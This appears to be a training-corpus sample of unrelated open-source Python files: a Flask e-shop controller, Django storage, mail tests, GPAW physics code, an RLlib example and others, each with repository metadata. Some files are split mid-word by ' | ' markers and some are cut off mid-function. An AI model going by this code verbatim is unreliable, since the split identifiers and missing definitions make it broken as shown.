'Existing MolProbity score of {} found for model {}'.format(
prev_molprobity_score, model_id
)
)
return prev_molprobity_score
molprobity_results = run_molprobity_oneline_analysis(
targetid, model_id, model_structure_filename
)
if molprobity_results is None:
logger.debug('MolProbity returned no results for model {}'.format(model_id))
return None
logger.debug('MolProbity score of {} calculated for model {}'.format(molprobity_results.get('MolProbityScore'), model_id))
molprobity_score = molprobity_results.get('MolProbityScore')
if molprobity_score is not None:
write_molprobity_results_for_target(
molprobity_results, models_target_dir, model_id, ensembler_stage
)
return molprobity_score
def run_molprobity_oneline_analysis(targetid, model_id, model_structure_filename, tmp_model_dir=None):
"""
Runs oneline_analysis for a single model in a temp dir, and cleans up after.
"""
if tmp_model_dir is None:
tmp_model_dir = tempfile.mkdtemp()
try:
source_path = os.path.join(
default_project_dirnames.models,
targetid,
model_id,
model_structure_filename
)
dest_path = os.path.join(
tmp_model_dir,
model_id + '.pdb'
)
source_model_traj = mdtraj.load_pdb(source_path)
protein_only_traj = source_model_traj.atom_slice(
source_model_traj.top.select('protein')
)
protein_only_traj.save_pdb(dest_path)
stdout, stderr = molprobity_oneline_analysis_cmd(tmp_model_dir)
output_text = '\n'.join([stdout, stderr])
molprobity_results = parse_molprobity_oneline_analysis_output(output_text)
molprobity_model_results = molprobity_results.get(model_id)
finally:
shutil.rmtree(tmp_model_dir)
return molprobity_model_results
def molprobity_oneline_analysis_cmd(dir_path):
p = Popen(
[
|
wdm0006/myflaskapp | myflaskapp/utils.py | Python | bsd-3-clause | 777 | 0.002574 | # -*- coding: utf-8 -*-
"""Helper utilities and decorators."""
from flask import flash, render_template, current | _app
def flash_errors(form, category="warning"):
"""Flash all errors for a form."""
for field, errors in form.errors.items():
for error in errors:
flash("{0} - {1}"
.format(getattr(form, field).label.text, error), category)
def render_extensions(template_path, **kwargs):
"""
Wraps around the standard render template method | and shoves in some other stuff out of the config.
:param template_path:
:param kwargs:
:return:
"""
return render_template(template_path,
_GOOGLE_ANALYTICS=current_app.config['GOOGLE_ANALYTICS'],
**kwargs)
|
grap/odoo-eshop | odoo_eshop/eshop_app/controllers/controller_account.py | Python | agpl-3.0 | 11,619 | 0 | #! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Standard Lib
import io
# Extra Libs
from flask import request, render_template, flash, session, abort, send_file
from flask.ext.babel import gettext as _
# Custom Tools
from ..application import app
from ..tools.web import redirect_url_for
from ..tools.erp import (
get_invoice_pdf,
get_order_pdf,
)
from ..tools.auth import logout, requires_connection, requires_auth
# Custom Models
from ..models.models import execute_odoo_command
from ..models.res_partner import (
partner_domain,
get_current_partner,
get_current_partner_id,
check_email,
check_first_name,
check_last_name,
check_phone,
check_password,
)
from ..models.res_company import get_current_company
# ############################################################################
# Account Route
# ############################################################################
@app.route("/account", methods=['GET', 'POST'])
@requires_auth
def account():
incorrect_data = False
vals = {}
if not len(request.form) == 0:
# Check Password
if 'checkbox-change-password' in request.form:
password, error_message = check_password(
request.form['password_1'], request.form['password_2'])
if error_message:
incorrect_data = True
flash(error_message, "danger")
else:
vals.update({"eshop_password": password})
# Check Phone
phone, error_message = check_phone(request.form['phone'])
if error_message and phone:
incorrect_data = True
flash(error_message, "danger")
# Check Phone
mobile, error_message = check_phone(request.form['mobile'])
if error_message and mobile:
incorrect_data = True
flash(error_message, "danger")
if not incorrect_data:
vals.update({
"street": request.form['street'],
"street2": request.form['street2'],
"zip": request.form['zip'],
"city": request.form['city'],
"phone": phone,
"mobile": mobile,
})
execute_odoo_command(
"res.partner", "update_from_eshop",
get_current_partner_id(), vals)
flash(
_("Account Datas updated successfully."),
"success",
)
partner = get_current_partner(force_reload=True)
return render_template('account.html', partner=partner)
# ############################################################################
# Orders Route
# ############################################################################
@app.route("/orders")
@requires_auth
def orders():
orders = execute_odoo_command(
"sale.order", "browse", [
partner_domain('partner_id'),
('state', 'not in', ('draft', 'cancel')),
]
)
return render_template('orders.html', orders=orders)
@app.route('/order/<int:order_id>/download')
def order_download(order_id):
order = execute_odoo_command("sale.order", "browse", order_id)
partner = get_current_partner()
# Manage Access Rules
if not order or order.partner_id.id != partner.id:
return abort(404)
content = get_order_pdf(order_id)
filename = "%s_%s.pdf" % (_('order'), order.name.replace('/', '_'))
return send_file(
io.BytesIO(content),
as_attachment=True,
attachment_filename=filename,
mimetype='application/pdf'
)
# ############################################################################
# Invoices Route
# ############################################################################
@app.route("/invoices")
@requires_auth
def invoices():
invoices = execute_odoo_command(
"account.invoice", "browse", [
partner_domain('partner_id'),
('state', 'not in', ['draft', 'proforma', 'proforma2', 'cancel']),
]
)
return render_template('invoices.html', invoices=invoices)
@app.route('/invoices/<int:invoice_id>/download')
def invoice_download(invoice_id):
invoice = execute_odoo_command(
"account.invoice", "browse", invoice_id)
partner = get_current_partner()
if not invoice or invoice.partner_id.id != partner.id:
return abort(404)
content = get_invoice_pdf(invoice_id)
filename = "%s_%s.pdf" % (_('invoice'), invoice.number.replace('/', '_'))
return send_file(
io.BytesIO(content),
as_attachment=True,
attachment_filename=filename,
mimetype='application/pdf'
)
# ############################################################################
# Auth Route
# ############################################################################
@app.route('/login.html/', defaults={'email': False}, methods=['GET', 'POST'])
@app.route("/login.html/<string:email>", methods=['GET', 'POST'])
@requires_connection
def login_view(email=False):
if request.form.get('login', False):
# Authentication asked
partner_id = execute_odoo_command(
"res.partner", "eshop_login",
request.form['login'], request.form['password']
)
if partner_id:
session['partner_id'] = partner_id
return redirect_url_for('home_logged')
else:
flash(_('Login/password incorrects'), "danger")
return render_template('login.html', email=email)
@app.route("/logout.html")
@requires_connection
def logout_view():
logout()
return redirect_url_for('home')
@app.route("/register.html", methods=['GET', 'POST'])
@requires_connection
def register():
# Check if the operation is possible
company = get_current_company()
if not company.eshop_register_allowed or get_current_partner():
return redirect_url_for('home')
if len(request.form) == 0:
return render_template('register.html')
incorrect_data = False
# Check First Name
first_name, error_message = check_first_name(
request.form["first_name"])
if error_message:
incorrect_data = True
flash(error_message, "danger")
# Check Last Name
last_name, error_message = check_last_name(
request.form["last_name"])
if error_message:
incorrect_data = True
flash(error_message, "danger")
# Check email
email, error_message = check_email(request.form.get('email', False))
if error_message:
incorrect_data = True
flash(error_message, "danger")
elif email:
partner_ids = execute_odoo_command(
"res.partner", "search", [('email', '=', email)])
if len(partner_ids) > 1:
incorrect_data = True
flash(_(
"The '%(email)s' field is already used."
"Please ask your seller to fix the problem.",
email=email), "danger")
elif len(partner_ids) == 1:
incorrect_data = True
partner = execute_odoo_command(
"res.partner", "browse", partner_ids)[0]
if partner.eshop_state == "enabled":
flash(_(
"The '%(email)s' field is already associated to an"
" active account. Please click 'Recover Password',"
" if your forgot your credentials.", email=email),
"danger")
| elif partner.eshop_state == 'email_to_confirm':
flash(_(
"The '%(email)s' field is already associated to an"
" account. Please finish the process to create an"
" account, by clicking on the link you received "
" by email.", email=email), "danger")
| else:
flash(_(
"The '%(email)s' field is already associated to an"
" inactive account. Please ask your seller to activate"
" your account.", email=email), "danger")
# Check Phone
phone, error_message = check_phone(request.f |
alexhayes/django-toolkit | django_toolkit/storage.py | Python | mit | 1,108 | 0.002708 | import os
from django.core.files.storage import FileSystemStorage
from django.conf import settings
class OverwriteStorage(FileSystemStorage):
def get_available_name(self, name):
"""Returns a filename that's free on the target storage system, and
av | ailable for new content to be written to.
Found at http://djangosnippets.org/snippets/976/
This file storage solves overwrite on upload problem. Another
proposed solution was to override the save method on the model
like so (from https://code.djangoproject.com/ticket/11663):
def save(self, *args, **kwargs):
try:
this = MyModelName.objects.get(id=self.id)
| if this.MyImageFieldName != self.MyImageFieldName:
this.MyImageFieldName.delete()
except: pass
super(MyModelName, self).save(*args, **kwargs)
"""
# If the filename already exists, remove it as if it was a true file system
if self.exists(name):
os.remove(os.path.join(settings.MEDIA_ROOT, name))
return name |
pkimber/mail | example_mail/tests/test_service.py | Python | apache-2.0 | 8,283 | 0 | # -*- encoding: utf-8 -*-
import filecmp
import json
import os
import pytest
from django.contrib.contenttypes.models import ContentType
from django.core import mail
from unittest import mock
from example_mail.base import get_env_variable
from example_mail.tests.model_maker import make_enquiry
from mail.models import Mail, MailError, MailField, MailTemplate, Message
from mail.service import (
_can_use_debug_console,
_can_use_mailgun,
_can_use_smtp,
queue_mail_message,
queue_mail_template,
send_mail,
)
def _mail(enquiry):
message = Message.objects.get(
content_type=ContentType.objects.get_for_model(enquiry),
object_id=enquiry.pk
)
return message.mail_set.all()[0]
def _queue_enquiry(attachments=None):
if not attachments:
attachments = []
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
enquiry = make_enquiry(
email_address,
"Farming",
'How many cows in the field?',
)
queue_mail_message(
enquiry,
[enquiry.email, ],
enquiry.subject,
enquiry.description,
attachments=attachments,
)
return enquiry
def _create_welcome_template():
welcome_template = MailTemplate.objects.init_mail_template(
'welcome',
'Welcome...',
'Available variables {{name}} {{title}} and {{question}}',
False,
MailTemplate.DJANGO,
)
welcome_template.subject = "Welcome {{name}}"
welcome_template.description = (
"Hello {{name}}\n\n"
"Welcome to the {{title}} group\n\n"
"We acknowledge your question {{question}}\n\n"
"We probably won't answer it because we've not written "
"that bit of code yet\n\n"
"The {{ title }} team\n"
)
welcome_template.save()
return welcome_template
def _create_goodbye_mandrill_template():
goodbye_template = MailTemplate.objects.init_mail_template(
'goodbye',
'Goodbye...',
'Available variables *|name|* *|title|* and *|question|*',
True,
MailTemplate.MANDRILL,
)
goodbye_template.subject = "Goodbye *|name|*"
goodbye_template.description = (
"Goodbye *|name|*\n\n"
"Sorry you are leaving the *|title|* group\n\n"
"You had a question *|question|* sorry we've not answered it yet\n\n"
"The *|title|* team\n"
)
goodbye_template.save()
return goodbye_template
def _create_goodbye_sparkpost_template():
goodbye_template = MailTemplate.objects.init_mail_template(
'goodbye-sparkpost',
'Goodbye...',
'Available variables {{name}} {{title}} and {{question}}',
True,
MailTemplate.SPARKPOST,
)
goodbye_template.subject = "Goodbye {{name}}"
goodbye_template.description = (
"Goodbye {{name}}\n\n"
"Sorry you are leaving the {{title}} group\n\n"
"You had a question {{question}} sorry we've not answered it yet\n\n"
"The {{title}} team\n"
)
goodbye_template.save()
return goodbye_template
@pytest.mark.django_db
def test_can_use_debug_console(settings):
settings.DEBUG = True
settings.EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
assert _can_use_debug_console() is True
@pytest.mark.django_db
def test_can_use_debug_console_not(settings):
settings.DEBUG = False
assert _can_use_debug_console() is False
@pytest.mark.django_db
def test_can_use_mailgun(settings):
settings.EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
assert _can_use_mailgun() is True
@pytest.mark.django_db
def test_can_use_mailgun_not(settings):
settings.EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
assert _can_use_mailgun() is False
@pytest.mark.django_db
def test_can_use_smtp(settings):
settings.EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
assert _can_use_smtp() is True
@pytest.mark.django_db
def test_queue_mail():
enquiry = _queue_enquiry()
message = Message.objects.get(subject='Farming')
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
mail = Mail.objects.get(email=email_address)
assert message == mail.message
assert enquiry == message.content_object
@pytest.mark.django_db
def test_queue_mail_with_attachment():
file_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data',
'sample.odt',
)
enquiry = _queue_enquiry([file_name])
message = Message.objects.get(subject='Farming')
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
mail = Mail.objects.get(email=email_address)
assert message == mail.message
assert enquiry == message.content_object
assert 1 == message.attachments().count()
assert filecmp.cmp(
file_name,
message.attachments().first().document.file.name,
shallow=False
) is True
@pytest.mark.django_db
def test_queue_mail_message():
email_address = get_env_variable('TEST_EMAIL_ADDRESS_2')
if not email_address:
raise MailError("Cannot test without a 'TEST_EMAIL_ADDRESS_2'")
enquiry = make_enquiry(
email_address,
"Welcome",
'Can I join your club?',
)
template = _create_welcome_template()
content_data = {
email_address: {
"name": "Fred",
"title": "SpaceX",
"question": enquiry.description,
"dict": {'age': 52, 'colour': 'blue'},
"list": [1, 3, 9],
}
}
queue_mail_template(enquiry, template.slug, content_data)
message = Message.objects.get(subject='Welcome {{name}}')
mail_item = Mail.objects.get(email=email_address)
assert message == mail_item.message
assert enquiry == mail_item.message.content_object
# name
obj = MailField.objects.get(key='name')
assert 'Fred' == obj.value
assert obj.is_json is False
# dict
obj = MailField.objects.get(key='dict')
assert obj.is_json is True
assert {'age': 52, 'colour': 'blue'} == json.loads(obj.value)
# list
obj = MailField.objects.get(key='list')
assert obj.is_json is True
assert [1, 3, 9] == json.loads(obj.value)
@pytest.mark.django_db
def test_queue_mail_message_and_send_via_mandrill(settings):
settings.EMAIL_BACKEND = "djrill.mail.backends.djrill.DjrillBackend"
with mock.patch('django.core.mail.EmailMultiAlternatives') as mock_mail:
mock_mail.return_value.mandrill_response = [{
"email": "abc@test.com",
"status": "sent",
"_id": "123",
"reject_reason": None,
}]
email_address = get_env_variable('TEST_EMAIL_ADDRESS_2')
enquiry = make_enquiry(
email_address,
"Welcome",
'Can I join your club?',
)
template = _create_goodbye_mandrill_template()
content_data = {
email_address: {
"name": "Fred",
"title": "SpaceX",
"question": enquiry.description
}
}
queue_mail_template(e | nquiry, template.slug, content_data)
m = _mail(enquiry)
assert m.sent is None
assert m.sent_response_code is None
assert m.message.subject == 'Goodbye *|name|*'
# test the send facility using djrill mail backend
# temp_email_backend = settings.EMAIL_BACKEND
send_mail()
m = _mail(enquiry)
assert m.sent is not None
assert m.sent_response_code is not None
@pytest.mark.django_db
def test_queue_no_email():
email_add | ress = get_env_variable('TEST_EMAIL_ADDRESS_1')
enquiry = make_enquiry(
email_address,
"Farming",
'How many cows in the field?',
)
with pytest.raises(MailError) as e:
queue_mail_message(
enquiry,
[],
enquiry.subject,
enquiry.description,
)
expect = "Cannot 'queue_mail_message' without 'email_addresses'"
assert expect in str(e.value)
@pytest.mark.django_db
def test_send_mail():
enquiry = _queue_enquiry()
m = _mail(enquiry)
assert m.sent is None |
paulfantom/Central-Heating-webpage | app/core/forms.py | Python | mpl-2.0 | 3,303 | 0.009385 | from flask_wtf import Form
from wtforms.fields.html5 import DecimalRangeField
from wtforms.fields import TextField, SubmitField, DateTimeField, DecimalField,\
HiddenField, BooleanField, PasswordField
from wtforms import ValidationError
from wtforms.validators import Optional, EqualTo, Required, Length
from flask import request
from flask.ext.babel import lazy_gettext as _
from app import babel
class NextFormMixin():
next = HiddenField()
def validate_next(self, field):
if field.data and not validate_redirect_url(field.data):
field.data = ''
flash(*get_message('INVALID_REDIRECT'))
r | aise ValidationError(get_message('INVALID_REDIRECT')[0])
class LoginForm(Form,NextFormMixin):
username = TextField(_('Username'),validators=[Required()],descrip | tion=_('Username'))
password = PasswordField(_('Password'),validators=[Required()],description=_('Password'))
remember = BooleanField(_('Remember me'))
next = HiddenField()
submit = SubmitField(_('Login'))
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
if not self.next.data:
self.next.data = request.args.get('next', '')
self.remember.default = False
# self.remember.default = config_value('DEFAULT_REMEMBER_ME')
def validate(self):
if not super(LoginForm, self).validate():
return False
if self.username.data.strip() == '':
self.username.errors.append(_("No username provided"))
return False
if self.password.data.strip() == '':
self.password.errors.append(_("No password provided"))
return False
return True
class RangeForm(Form):
slider = DecimalRangeField('Slider', validators=[Required()])
submit = SubmitField(_('Save'))
class PasswordForm(Form):
password = PasswordField(_('New password'), [
Required(),
Length(min=8, message='Password too short. Minimum 8 signs'),
EqualTo('confirm', message=_('Passwords must match')) ], description=_("New password"))
confirm = PasswordField(_('Repeat password'), description=_("Repeat password"))
next = HiddenField()
submit = SubmitField(_('Change'))
class OptionsForm(Form):
apparent = SubmitField("",
validators=[Optional()],
description=True)
reset_pass = SubmitField(_('Reset password'),validators=[Optional()])
reboot = SubmitField(_('Reboot HMI'),validators=[Optional()])
# reboot_mcu = SubmitField(_('Reboot MCU'),validators=[Optional()])
class WeekForm(Form):
day_1 = SubmitField(_('Monday'),validators=[Optional()])
day_2 = SubmitField(_('Tuesday'),validators=[Optional()])
day_3 = SubmitField(_('Wednesday'),validators=[Optional()])
day_4 = SubmitField(_('Thursday'),validators=[Optional()])
day_5 = SubmitField(_('Friday'),validators=[Optional()])
day_6 = SubmitField(_('Saturday'),validators=[Optional()])
day_7 = SubmitField(_('Sunday'),validators=[Optional()])
class RowForm(Form):
time_from = DateTimeField(format="%H:%M")
time_to = DateTimeField(format="%H:%M")
temperature = DecimalField(places=1,use_locale=True)
|
robwarm/gpaw-symm | gpaw/xc/noncollinear.py | Python | gpl-3.0 | 13,580 | 0.001105 | from math import sqrt, pi
import numpy as np
from gpaw.xc.functional import XCFunctional
from gpaw.xc.lda import LDA
from gpaw.xc.libxc import LibXC
from gpaw.lcao.eigensolver import LCAO
from gpaw.wavefunctions.lcao import LCAOWaveFunctions
from gpaw.utilities import unpack
from gpaw.utilities.blas import gemm
from gpaw.mixer import BaseMixer
from gpaw.utilities.tools import tri2full
from gpaw.sphere.lebedev import Y_nL, weight_n
from gpaw.xc.pawcorrection import rnablaY_nLv
X = np.newaxis
class NonCollinearLDAKernel(LibXC):
def __init__(self):
LibXC. | __init__(self, 'LDA')
def calculate(self, e_g, n_sg, dedn_sg,
| sigma_xg=None, dedsigma_xg=None,
tau_sg=None, dedtau_sg=None):
n_g = n_sg[0]
m_vg = n_sg[1:4]
m_g = (m_vg**2).sum(0)**0.5
nnew_sg = np.empty((2,) + n_g.shape)
nnew_sg[:] = n_g
nnew_sg[0] += m_g
nnew_sg[1] -= m_g
nnew_sg *= 0.5
vnew_sg = np.zeros_like(nnew_sg)
LibXC.calculate(self, e_g, nnew_sg, vnew_sg)
dedn_sg[0] += 0.5 * vnew_sg.sum(0)
vnew_sg /= np.where(m_g < 1e-15, 1, m_g)
dedn_sg[1:4] += 0.5 * vnew_sg[0] * m_vg
dedn_sg[1:4] -= 0.5 * vnew_sg[1] * m_vg
class NonCollinearFunctional(XCFunctional):
def __init__(self, xc):
XCFunctional.__init__(self, xc.name)
self.xc = xc
self.type = xc.type
def calculate(self, gd, n_sg, dedn_sg=None, e_g=None):
n_g = n_sg[0]
m_vg = n_sg[1:4]
m_g = (m_vg**2).sum(0)**0.5
nnew_sg = gd.empty(2)
nnew_sg[:] = n_g
nnew_sg[0] += m_g
nnew_sg[1] -= m_g
nnew_sg *= 0.5
vnew_sg = gd.zeros(2)
if e_g is None:
e_g = gd.empty()
exc = self.xc.calculate(gd, nnew_sg, vnew_sg, e_g)
if dedn_sg is not None:
dedn_sg[0] += 0.5 * vnew_sg.sum(0)
vnew_sg /= np.where(m_g < 1e-15, 1, m_g)
dedn_sg[1:4] += 0.5 * vnew_sg[0] * m_vg
dedn_sg[1:4] -= 0.5 * vnew_sg[1] * m_vg
return exc
def calculate_paw_correction(self, setup, D_sp, dEdD_sp=None,
addcoredensity=True, a=None):
c = setup.xc_correction
if c is None:
return 0.0
assert addcoredensity
assert len(D_sp) == 4
assert c.nc_corehole_g is None
rgd = c.rgd
nc0_g = sqrt(4 * pi) * c.nc_g
nct0_g = sqrt(4 * pi) * c.nct_g
D_sLq = np.inner(D_sp, c.B_pqL.T)
e, dEdD_sqL = self.calculate_radial_expansion(rgd, D_sLq, c.n_qg,
nc0_g)
et, dEtdD_sqL = self.calculate_radial_expansion(rgd, D_sLq, c.nt_qg,
nct0_g)
if dEdD_sp is not None:
dEdD_sp += np.inner((dEdD_sqL - dEtdD_sqL).reshape((4, -1)),
c.B_pqL.reshape((len(c.B_pqL), -1)))
return e - et - c.Exc0
def calculate_radial_expansion(self, rgd, D_sLq, n_qg, nc0_g):
D_Lq = D_sLq[0]
M_vLq = D_sLq[1:]
n_Lg = np.dot(D_Lq, n_qg)
n_Lg[0] += nc0_g
m_vLg = np.dot(M_vLq, n_qg)
if self.xc.type == 'GGA':
dndr_Lg = np.empty_like(n_Lg)
rgd.derivative(n_Lg, dndr_Lg)
dmdr_vLg = np.empty_like(m_vLg)
rgd.derivative(m_vLg, dmdr_vLg)
elif self.xc.type == 'LDA':
dndr_Lg = None
dmdr_vLg = None
Lmax, nq = D_Lq.shape
dEdD_sqL = np.zeros((4, nq, Lmax))
E = 0.0
for w, Y_L, rnablaY_Lv in zip(weight_n,
Y_nL[:, :Lmax],
rnablaY_nLv[:, :Lmax]):
if self.xc.type == 'LDA':
(e_g, dedn_g, dedm_vg) = \
self.calculate_radial(rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
m_vLg, dmdr_vLg)
else:
(e_g, dedn_g, dedm_vg,
a_g, b_vg, c_g, d_vg, dedsigma_xg, dcdm_vg, dddm_vLvg,
m_vg, m_g) = \
self.calculate_radial(rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
m_vLg, dmdr_vLg)
dEdD_sqL[0] += np.dot(rgd.dv_g * dedn_g,
n_qg.T)[:, X] * (w * Y_L)
dEdD_sqL[1:] += np.dot(rgd.dv_g * dedm_vg,
n_qg.T)[:, :, X] * (w * Y_L)
if self.xc.type == 'GGA':
v_g = rgd.empty()
rgd.derivative2(rgd.dv_g * (dedsigma_xg[0] * (a_g + c_g) +
dedsigma_xg[1] * a_g +
dedsigma_xg[2] * (a_g - c_g)), v_g)
dEdD_sqL[0] -= np.dot(v_g, n_qg.T)[:, X] * (0.5 * w * Y_L)
B_vg = (dedsigma_xg[0] * (b_vg + d_vg) +
dedsigma_xg[1] * b_vg +
dedsigma_xg[2] * (b_vg - d_vg))
B_vq = np.dot(B_vg * rgd.dr_g, n_qg.T)
dEdD_sqL[0] += 2 * pi * w * np.dot(rnablaY_Lv, B_vq).T
A_g = (dedsigma_xg[0] * (a_g + c_g) -
dedsigma_xg[1] * c_g +
dedsigma_xg[2] * (c_g - a_g)) * rgd.dv_g
v_vg = rgd.empty(3)
rgd.derivative2(A_g * m_vg / m_g, v_vg)
v_vg -= A_g * dcdm_vg
dEdD_sqL[1:] -= np.dot(v_vg, n_qg.T)[:, :, X] * (0.5 * w * Y_L)
dedsigma_xg *= rgd.dr_g
B_vg = (dedsigma_xg[0] * (b_vg + d_vg) -
dedsigma_xg[1] * d_vg +
dedsigma_xg[2] * (d_vg - b_vg))
B_Lvq = np.dot((B_vg[:, X, X] * dddm_vLvg).sum(0), n_qg.T)
dEdD_sqL[1:] += 2 * pi * w * B_Lvq.transpose((1, 2, 0))
E += w * rgd.integrate(e_g)
return E, dEdD_sqL
def calculate_radial(self, rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
m_vLg, dmdr_vLg):
n_g = np.dot(Y_L, n_Lg)
m_vg = np.dot(Y_L, m_vLg)
m_g = (m_vg**2).sum(0)**0.5
eps = 1e-15
m_g[m_g < eps] = eps
n_sg = rgd.empty(2)
n_sg[:] = n_g
n_sg[0] += m_g
n_sg[1] -= m_g
n_sg *= 0.5
e_g = rgd.empty()
dedn_sg = rgd.zeros(2)
if self.xc.type == 'GGA':
dmdr_vg = np.dot(Y_L, dmdr_vLg)
a_g = np.dot(Y_L, dndr_Lg)
b_vg = np.dot(rnablaY_Lv.T, n_Lg)
c_g = (m_vg * dmdr_vg).sum(0) / m_g
m_vvg = np.dot(rnablaY_Lv.T, m_vLg)
d_vg = (m_vg * m_vvg).sum(1) / m_g
sigma_xg = rgd.empty(3)
sigma_xg[0] = ((b_vg + d_vg)**2).sum(0)
sigma_xg[1] = ((b_vg + d_vg) * (b_vg - d_vg)).sum(0)
sigma_xg[2] = ((b_vg - d_vg)**2).sum(0)
sigma_xg[:, 1:] /= rgd.r_g[1:]**2
sigma_xg[:, 0] = sigma_xg[:, 1]
sigma_xg[0] += (a_g + c_g)**2
sigma_xg[1] += (a_g + c_g) * (a_g - c_g)
sigma_xg[2] += (a_g - c_g)**2
sigma_xg *= 0.25
dedsigma_xg = rgd.zeros(3)
self.xc.kernel.calculate(e_g, n_sg, dedn_sg, sigma_xg, dedsigma_xg)
else:
self.xc.kernel.calculate(e_g, n_sg, dedn_sg)
dedn_g = 0.5 * dedn_sg.sum(0)
dedn_sg /= m_g
dedm_vg = 0.5 * (dedn_sg[0] - dedn_sg[1]) * m_vg
if self.xc.type == 'GGA':
dcdm_vg = (dmdr_vg - (m_vg * dmdr_vg).sum(0) * m_vg / m_g**2) / m_g
dddm_vLvg = rnablaY_Lv.T[:, :, X, X] * m_vg
dddm_vLvg += m_vvg[:, X] * Y_L[:, X, X]
dddm_vLvg -= d_vg[:, X, X, :] * m_vg[X, X] * Y_L[:, X, X] / m_g
dddm_vLvg /= m_g
return (e_g, dedn_g, dedm_vg,
a_g, b_vg, c_g, d_vg, dedsigma_xg, dcdm_vg, dddm_vLvg,
m_vg, m_g)
return e_g, dedn_g, dedm_vg
class NonCollinearLCAOEigensolver(LCAO):
def calculate |
robertnishihara/ray | rllib/examples/mobilenet_v2_with_lstm.py | Python | apache-2.0 | 1,849 | 0 | # Explains/tests Issues:
# https:/ | /github.c | om/ray-project/ray/issues/6928
# https://github.com/ray-project/ray/issues/6732
import argparse
from gym.spaces import Discrete, Box
import numpy as np
from ray.rllib.agents.ppo import PPOTrainer
from ray.rllib.examples.env.random_env import RandomEnv
from ray.rllib.examples.models.mobilenet_v2_with_lstm_models import \
MobileV2PlusRNNModel, TorchMobileV2PlusRNNModel
from ray.rllib.models import ModelCatalog
from ray.rllib.utils.framework import try_import_tf
tf1, tf, tfv = try_import_tf()
cnn_shape = (4, 4, 3)
# The torch version of MobileNetV2 does channels first.
cnn_shape_torch = (3, 224, 224)
parser = argparse.ArgumentParser()
parser.add_argument("--torch", action="store_true")
if __name__ == "__main__":
args = parser.parse_args()
# Register our custom model.
ModelCatalog.register_custom_model(
"my_model", TorchMobileV2PlusRNNModel
if args.torch else MobileV2PlusRNNModel)
# Configure our Trainer.
config = {
"framework": "torch" if args.torch else "tf",
"model": {
"custom_model": "my_model",
# Extra config passed to the custom model's c'tor as kwargs.
"custom_model_config": {
"cnn_shape": cnn_shape_torch if args.torch else cnn_shape,
},
"max_seq_len": 20,
},
"vf_share_layers": True,
"num_workers": 0, # no parallelism
"env_config": {
"action_space": Discrete(2),
# Test a simple Image observation space.
"observation_space": Box(
0.0,
1.0,
shape=cnn_shape_torch if args.torch else cnn_shape,
dtype=np.float32)
},
}
trainer = PPOTrainer(config=config, env=RandomEnv)
print(trainer.train())
|
ctuning/ck-autotuning | module/compiler/module.py | Python | bsd-3-clause | 28,151 | 0.032148 | #
# Collective Knowledge (compiler choices)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
cfg={} # Will be updated by CK (meta description of this module)
work={} # Will be updated by CK (temporal data)
ck=None # Will be updated by CK (initialized CK kernel)
# Local settings
##############################################################################
# Initialize module
def init(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
return {'return':0}
##############################################################################
# extract choices to universal pipeline tuning
def extract_to_pipeline(i):
"""
Input: {
(data_uoa) - compiler description
(file_in) - JSON pipeline template
(file_out) - output prepared pipeline to this file
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
pipeline - prepared pipeline
}
"""
fo=i.get('file_out','')
fi=i.get('file_in','')
duoa=i.get('data_uoa','')
# Prepare pipeline template
ck.out('Preparing pipeline template ...')
if fi=='':
fi=os.path.join(work['path'],cfg['pipeline_template'])
r=ck.load_json_file({'json_file':fi})
if r['return']>0: return r
pipeline=r['dict']
# Load or select compiler description
ck.out('')
ck.out('Selecting compiler and description ...')
if duoa=='':
rx=ck.access({'action':'search',
'module_uoa':work['self_module_uid']})
if rx['return']>0: return rx
lst=rx['lst']
if len(lst)==0:
duoa=''
elif len(lst)==1:
duid=lst[0]['data_uid']
duoa=lst[0]['data_uoa']
else:
# SELECTOR *************************************
ck.out('')
ck.out('Multiple choices available:')
ck.out('')
r=ck.select_uoa({'choices':lst})
if r['return']>0: return r
duoa=r['choice']
if duoa=='':
return {'return':1, 'error':'no compiler description selected'}
# Load compiler desc
rx=ck.access({'action':'load',
'module_uoa':work['self_module_uid'],
'data_uoa':duoa})
if rx['return']>0: return rx
d=rx['dict']
dsc=rx.get('desc',{})
dx=dsc.get('all_compiler_flags_desc',{})
# Update pipeline
ck.out('')
ck.out('Updating pipeline choices with compiler flags ...')
if 'pipeline' not in pipeline: pipeline['pipeline']={}
px=pipeline['pipeline']
px['choices_desc']={}
for q in dx:
qq=dx[q]
q1=q
if q1.startswith('##'): q1=q1[1:]
q1='##compiler_flags'+q1
px['choices_desc'][q1]=qq
# Saving file
if fo!='':
ck.out('')
ck.out('Writing pipeline ...')
rx=ck.save_json_to_file({'json_file':fo, 'dict':pipeline})
if rx['return']>0: return rx
return {'return':0, 'pipeline':pipeline}
##############################################################################
# extract optimization flags and parameters from a compiler for autotuning (currently GCC)
# Note: GCC sources are needed - this script searches for GCC opts in all sub-directories
# in a current directory. Therefore, just untar all GCC sources in current directory.
#
# (partially based on scripts from Abdul Wahid Memon and Yuriy Kashnikov)
def extract_opts(i):
"""
Input: {
(record) - if 'yes, record to repo
(repo_uoa) - repo UOA to record compiler description
(data_uoa) - data UOA to record compiler description (if empty, autogenerate)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import os
import sys
import datetime
o=i.get('out','')
p=os.getcwd()
f1a=cfg['gcc_src_opt_file1']
f1b=cfg['gcc_src_opt_file2']
f2=cfg['gcc_src_params']
results={}
# Checking if GCC
try:
dirList=os.listdir(p)
except Exception as | e:
None
else:
for fn in dirList:
pp=os.path.join(p, fn)
if os.path.isdir(pp) and fn.startswith('gcc-'):
| found=False
